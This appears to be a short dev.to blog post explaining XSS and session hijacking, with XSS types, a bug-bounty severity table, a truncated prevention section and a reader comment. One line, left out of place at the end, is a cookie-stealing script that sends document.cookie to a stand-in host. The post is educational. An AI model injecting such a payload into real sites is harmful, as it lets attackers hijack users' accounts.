![Cover image for [EP.02] Session Hijacking — The XSS Attack That Steals Your Account](https://media2.dev.to/dynamic/image/width=1000,height=500,fit=cover,gravity=auto,format=auto/https%3A%2F%2Fi.ytimg.com%2Fvi%2F57z94sEmElM%2Fmaxresdefault.jpg)
canonical_url: https://medium.com/@mahone0094/hackers-dont-need-your-password-anymore-they-just-need-one-unsanitized-input-7e8c87471070
By Bamdad Shahabi | CAISD — Cyber Intelligence & Digital Forensics
youtube.com/@CAISD_Official
XSS has been in OWASP Top 10 for 20+ years.
Nobody handled it.
What is XSS?
XSS (Cross-Site Scripting) allows attackers
to inject malicious scripts into trusted websites.
The browser executes them because they appear
to come from a legitimate source.
How does XSS steal your session?
A user logs into their bank.
An attacker already stored this as a "comment":
Server stored it. No sanitization. No filtering.
Browser loads page — runs the script.
Session token flies to evil.io.
No password touched. Just trust abused.
The 3 types of XSS
① Stored XSS — payload in database,
hits every user. P1 severity in bug bounty.
② Reflected XSS — bounces from URL,
needs a click. P2 severity.
③ DOM-based XSS — client-side only.
Server never sees it. WAFs are blind to it.
Bug Bounty severity
| Type | Severity |
|---|---|
| Stored XSS authenticated endpoint | P1 |
| Session hijack via document.cookie | P1 |
| Reflected XSS on login page | P2 |
| DOM XSS bypassing WAF | P2 |
How to prevent XSS
✅ Content-Security-Policy:
CAISD: CYBERSCOPE ADVANCED INTELLIGENCE & SECUR'I'TY DIRECTORATE
Top comments (2)
A clear and accurate explanation of how XSS escalates from a simple injection flaw to a full trust‑boundary compromise. The session‑hijack example demonstrates exactly why unsanitized input remains one of the most exploited vectors in modern web applications. Strong emphasis on CSP and proper output encoding is essential, and this article highlights that well.
new Image().src='//evil.io?d='+document.cookie